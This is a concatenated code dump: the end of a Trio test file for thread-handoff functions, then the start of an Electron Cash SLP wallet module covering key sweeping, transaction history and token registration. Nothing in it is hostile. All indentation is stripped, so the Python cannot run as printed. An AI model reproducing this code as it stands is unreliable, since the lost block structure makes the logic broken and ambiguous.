await wait_all_tasks_blocked()
# Then wait until the first MAX threads are parked in gate.wait(),
# and the next MAX threads are parked on the semaphore, to make
# sure no-one is sneaking past, and to make sure the high_water
# check below won't fail due to scheduling issues. (It could still
# fail if too many threads are let through here.)
while state.parked != MAX or c.statistics().tasks_waiting != MAX:
await sleep(0.01) # pragma: no cover
# Then release the threads
gate.set()
assert state.high_water == MAX
if cancel:
# Some threads might still be running; need to wait to them to
# finish before checking that all threads ran. We can do this
# using the CapacityLimiter.
while c.borrowed_tokens > 0:
await sleep(0.01) # pragma: no cover
assert state.ran == COUNT
assert state.running == 0
finally:
c.total_tokens = orig_total_tokens
async def test_run_in_worker_thread_custom_limiter():
# Basically just checking that we only call acquire_on_behalf_of and
# release_on_behalf_of, since that's part of our documented API.
record = []
class CustomLimiter:
async def acquire_on_behalf_of(self, borrower):
record.append("acquire")
self._borrower = borrower
def release_on_behalf_of(self, borrower):
record.append("release")
assert borrower == self._borrower
await to_thread_run_sync(lambda: None, limiter=CustomLimiter())
assert record == ["acquire", "release"]
async def test_run_in_worker_thread_limiter_error():
record = []
class BadCapacityLimiter:
async def acquire_on_behalf_of(self, borrower):
record.append("acquire")
def release_on_behalf_of(self, borrower):
record.append("release")
raise ValueError
bs = BadCapacityLimiter()
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(lambda: None, limiter=bs)
assert excinfo.value.__context__ is None
assert record == ["acquire", "release"]
record = []
# If the original function raised an error, then the semaphore error
# chains with it
d = {}
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(lambda: d["x"], limiter=bs)
assert isinstance(excinfo.value.__context__, KeyError)
assert record == ["acquire", "release"]
async def test_run_in_worker_thread_fail_to_spawn(monkeypatch):
# Test the unlikely but possible case where trying to spawn a thread fails
def bad_start(self, *args):
raise RuntimeError("the engines canna take it captain")
monkeypatch.setattr(_core._thread_cache.ThreadCache, "start_thread_soon", bad_start)
limiter = current_default_thread_limiter()
assert limiter.borrowed_tokens == 0
# We get an appropriate error, and the limiter is cleanly released
with pytest.raises(RuntimeError) as excinfo:
await to_thread_run_sync(lambda: None) # pragma: no cover
assert "engines" in str(excinfo.value)
assert limiter.borrowed_tokens == 0
async def test_trio_to_thread_run_sync_token():
# Test that to_thread_run_sync automatically injects the current trio token
# into a spawned thread
def thread_fn():
callee_token = from_thread_run_sync(_core.current_trio_token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn)
assert callee_token == caller_token
async def test_trio_from_thread_run_sync():
# Test that to_thread_run_sync correctly "hands off" the trio token to
# trio.from_thread.run_sync()
def thread_fn():
trio_time = from_thread_run_sync(_core.current_time)
return trio_time
trio_time = await to_thread_run_sync(thread_fn)
assert isinstance(trio_time, float)
# Test correct error when passed async function
async def async_fn(): # pragma: no cover
pass
def thread_fn():
from_thread_run_sync(async_fn)
with pytest.raises(TypeError, match="expected a sync function"):
await to_thread_run_sync(thread_fn)
async def test_trio_from_thread_run():
# Test that to_thread_run_sync correctly "hands off" the trio token to
# trio.from_thread.run()
record = []
async def back_in_trio_fn():
_core.current_time() # implicitly checks that we're in trio
record.append("back in trio")
def thread_fn():
record.append("in thread")
from_thread_run(back_in_trio_fn)
await to_thread_run_sync(thread_fn)
assert record == ["in thread", "back in trio"]
# Test correct error when passed sync function
def sync_fn(): # pragma: no cover
pass
with pytest.raises(TypeError, match="appears to be synchronous"):
await to_thread_run_sync(from_thread_run, sync_fn)
async def test_trio_from_thread_token():
# Test that to_thread_run_sync and spawned trio.from_thread.run_sync()
# share the same Trio token
def thread_fn():
callee_token = from_thread_run_sync(_core.current_trio_token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn)
assert callee_token == caller_token
async def test_trio_from_thread_token_kwarg():
# Test that to_thread_run_sync and spawned trio.from_thread.run_sync() can
# use an explicitly defined token
def thread_fn(token):
callee_token = from_thread_run_sync(_core.current_trio_token, trio_token=token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn, caller_token)
assert callee_token == caller_token
async def test_from_thread_no_token():
# Test that a "raw call" to trio.from_thread.run() fails because no token
# has been provided
with pytest.raises(RuntimeError):
from_thread_run_sync(_core.current_time)
def test_run_fn_as_system_task_catched_badly_typed_token():
with pytest.raises(RuntimeError):
from_thread_run_sync(_core.current_time, trio_token="Not TrioTokentype")
async def test_do_in_trio_thread_from_trio_thread_legacy():
# This check specifically confirms that a RuntimeError will be raised if
# the old BlockingTrIoPortal API calls into a trio loop while already
# running inside of one.
portal = BlockingTrioPortal()
with pytest.raises(RuntimeError):
portal.run_sync(lambda: None) # pragma: no branch
async def foo(): # pragma: no cover
pass
with pytest.raises(RuntimeError):
portal.run(foo)
async def test_BlockingTrioPortal_with_explicit_TrioToken():
# This tests the deprecated BlockingTrioPortal with a token passed in to
# confirm that both methods of making a portal are supported by
# trio.from_thread
token = _core.current_trio_token()
def worker_thread(token):
with pytest.raises(RuntimeError):
BlockingTrioPortal()
portal = BlockingTrioPortal(token)
return portal.run_sync(threading.current_thread)
t = await to_thread_run_sync(worker_thread, token)
assert t == threading.current_thread()
def test_BlockingTrioPortal_deprecated_export(recwarn):
import trio
btp = trio.BlockingTrioPortal
assert btp is BlockingTrioPortal
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import re
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from functools import partial
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp, ExcessiveFee, PrintError,
UserCancelled, profiler, format_satoshis, format_time, finalization_print_error, to_string,
TimeoutException, is_verbose)
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .paymentrequest import InvoiceStore
from .contacts import Contacts
from . import cashacct
from .slp import SlpMessage, SlpParsingError, SlpUnsupportedSlpTokenType, SlpNoMintingBatonFound, OpreturnError
from . import slp_validator_0x01, slp_validator_0x01_nft1, slp_slpdb_validator
from .slp_graph_search import slp_gs_mgr
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.pre_release_tag = PRE_RELEASE_TAG
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
finalization_print_error(self.cashacct) # debug object lifecycle
# slp graph databases for token type 1 and NFT1
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history chages). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@property
def is_slp(self):
''' Note that the various Slp_* classes explicitly write to storage
to set the proper wallet_type on construction unconditionally, so
this should always be valid for SLP wallets. '''
return "slp_" in self.storage.get('wallet_type', '')
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Adddress objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slpv1_validity = self.storage.get('slpv1_validity', {})
self.token_types = self.storage.get('token_types', {})
self.tx_tokinfo = self.storage.get('tx_tokinfo', {})
# load up slp_txo as defaultdict-of-defaultdict-of-dicts
self._slp_txo = defaultdict(lambda: defaultdict(dict))
for addr, addrdict in self.to_Address_dict(self.storage.get('slp_txo',{})).items():
for txid, txdict in addrdict.items():
# need to do this iteration since json stores int keys as decimal strings.
self._slp_txo[addr][txid] = {int(idx):d for idx,d in txdict.items()}
ok = self.storage.get('slp_data_version', False)
if ok != 3:
self.rebuild_slp()
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
### SLP stuff
self.storage.put('slpv1_validity', self.slpv1_validity)
self.storage.put('token_types', self.token_types)
self.storage.put('slp_txo', self.from_Address_dict(self._slp_txo))
self.storage.put('tx_tokinfo', self.tx_tokinfo)
self.storage.put('slp_data_version', 3)
if write:
self.storage.write()
def activate_slp(self):
# This gets called in two situations:
# - Upon wallet startup, it checks config to see if SLP should be enabled.
# - During wallet operation, on a network reconnect, to "wake up" the validator -- According to JSCramer this is required. TODO: Investigate why that is
with self.lock:
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes
try:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError:
continue
_add_token_hex_re = re.compile('^[a-f0-9]{64}$')
def add_token_type(self, token_id, entry, check_validation=True):
if not isinstance(token_id, str) or not self._add_token_hex_re.match(token_id):
# Paranoia: we enforce canonical hex string as lowercase to avoid
# problems with the same token-id being added as upper or lowercase
# by client code. This is because token_id becomes a dictionary key
# in various places and it not being identical would create chaos.
raise ValueError('token_id must be a lowercase hex string of exactly 64 characters!')
with self.lock:
self.token_types[token_id] = dict(entry)
self.storage.put('token_types', self.token_types)
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes of matching token_id
try:
if tti['token_id'] == token_id and check_validation:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError: # This catches the case where tx_tokinfo was set to {}
continue
def add_token_safe(self, token_class: str, token_id: str, token_name: str,
decimals_divisibility: int,
*, error_callback=None, allow_overwrite=False,
write_storage=True) -> bool:
''' This code was refactored from main_window.py to allow other
subsystems (eg CLI/RPC, other platforms, etc) to add tokens.
This function does some minimal sanity checks and returns True
on success or False on failure. The optional error_callback
is called on False return. The callback takes a single translated string
argument which is an error message (suitable for display to the user).
On success (True) return, this method ends up calling
self.add_token_type(), and also will end up saving the changes to
wallet storage if write_storage=True (the default).
This function is thread-safe. '''
token_name = token_name.strip()
token_id = token_id.strip().lower()
# Check for duplication error
d = self.token_types.get(token_id)
group_id = d.get('group_id', None) if d else None
if d is not None and not allow_overwrite:
if error_callback:
error_callback(_('Token with this hash id already exists'))
return False
for tid, d in self.token_types.copy().items(): # <-- must take a snapshot-copy here since we aren't holding locks and other threads may modify this dict as we iterate
if d['name'] == token_name and tid != token_id:
token_name = token_name + "-" + token_id[:3]
break
#Hash id validation
gothex = self._add_token_hex_re.match(token_id)
if not gothex:
if error_callback:
error_callback(_('Invalid token_id hash'))
return False
#token name validation
# if len(token_name) < 1 or len(token_name) > 20:
# if error_callback:
# error_callback(_('Token name should be 1-20 characters'))
# return False
new_entry = {
'class' : token_class,
'name' : token_name,
'decimals' : decimals_divisibility,
}
if token_class == "SLP65":
if group_id is None:
new_entry['group_id'] = "?"
else:
new_entry['group_id'] = group_id
self.add_token_type(token_id, new_entry)
self.save_transactions(bool(write_storage))
return True
def add_token_from_genesis_tx(self, tx_or_raw, *, error_callback=None, allow_overwrite=True) -> SlpMessage:
''' Returns None on failure, optionally calling error_callback
with a translated UI-suitable error message. Returns a valid
SlpMessage object on success. In exceptional circumstances (garbage
inputs), may raise.
Note that unlike the other add_token_* functions, this version defaults
to allow_overwrite = True.'''
tx = tx_or_raw
if not isinstance(tx, Transaction):
tx = Transaction(tx)
def fail(msg):
if error_callback:
error_callback(msg)
return None
token_id = tx.txid()
try:
slpMsg = SlpMessage.parseSlpOutputScript(tx.outputs()[0][1])
except SlpUnsupportedSlpTokenType as e:
return fail(_("Unsupported SLP token version/type - %r.")%(e.args[0],))
except SlpInvalidOutputMessage as e:
return fail(_("This transaction does not contain a valid SLP message.\nReason: %r.")%(e.args,))
if slpMsg.transaction_type != 'GENESIS':
return fail(_("This is an SLP transaction, however it is not a genesis transaction."))
token_name = slpMsg.op_return_fields['ticker'].decode('utf-8') or slpMsg.op_return_fields['token_name'].decode('utf-8')
decimals = slpMsg.op_return_fields['decimals']
token_class = 'SLP%d' % (slpMsg.token_type,)
if self.add_token_safe(token_class, token_id, token_name, decimals, error_callback=fail, allow_overwrite=allow_overwrite):
return slpMsg
else:
return None
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text=None, save=True):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
if save:
self.save_labels()
return changed
def save_labels(self):
self.storage.put('labels', self.labels)
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up siince is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
